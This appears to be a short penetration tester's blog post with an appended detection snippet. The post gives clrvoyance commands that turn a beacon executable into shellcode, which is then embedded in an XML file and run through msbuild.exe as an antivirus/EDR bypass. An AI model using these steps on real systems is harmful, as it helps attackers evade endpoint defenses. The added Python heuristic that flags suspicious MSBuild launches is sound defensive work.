I have been performing more and more external and internal penetration tests, as well as more and more offensive cyber security engagements, for my day job (compared to focusing on web application penetration tests).
One of the most useful tools I’ve found for internal penetration tests is clrvoyance, an alternative to donut.
How do you use clrvoyance?
Well, you take the executable and run the following:
First: python3 clrvoyance.py -a ~/directory/to/executable/beacon.exe -p32
Then: python3 clrvoyance.py -a ~/directory/to/executable/shellcode/beacon.exe.shellcode -d net
Now insert that shellcode into any XML file (which I’ll include in the future if you need one)
and use msbuild.exe to execute it!
Enjoy the Anti-Virus/EDR bypass 🙂
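From the blue-team side, the step that stands out in this chain is msbuild.exe being handed an XML project file from a user-writable directory, by a parent that is not a normal developer tool. The following is an added detection example written for this post (not part of the original post or of the clrvoyance project); the event field names (image, command_line, parent_image) and the sample records are constructed assumptions, so map them to your own process-creation telemetry (for example Sysmon Event ID 1).

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "command_line": r"MSBuild.exe C:\Users\alice\Downloads\build.xml",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "command_line": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "command_line": r"MSBuild.exe C:\Windows\Temp\task.xml",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Program Files\dotnet\sdk\8.0.100\MSBuild.dll",
     "command_line": r"dotnet build C:\src\app\app.csproj",
     "parent_image": r"C:\Program Files\dotnet\dotnet.exe"},
]

# Path fragments that a low-privileged user can normally write to (assumption).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")
# Parents that routinely launch MSBuild during legitimate builds (assumption).
DEV_PARENTS = ("devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe")
# First absolute Windows path ending in an MSBuild project-like extension.
PROJECT_RE = re.compile(r'([a-z]:\\[^\s"]+\.(?:xml|csproj|vbproj|proj))')


def is_suspicious_msbuild(event):
    """Flag MSBuild runs that build a project file from a user-writable
    location, or an .xml project launched by a non-developer parent."""
    image = PureWindowsPath(event["image"]).name.lower()
    if image != "msbuild.exe":
        return False
    cmd = event["command_line"].lower()
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    match = PROJECT_RE.search(cmd)
    if not match:
        return False
    project = match.group(1)
    from_user_dir = any(marker in project for marker in USER_WRITABLE)
    odd_parent = parent not in DEV_PARENTS
    return from_user_dir or (project.endswith(".xml") and odd_parent)


def flag_events(events):
    """Return the command lines of all events the heuristic flags."""
    return [e["command_line"] for e in events if is_suspicious_msbuild(e)]
```

The heuristic is deliberately narrow; tune the path markers and parent list to your build hosts before turning it into an alert.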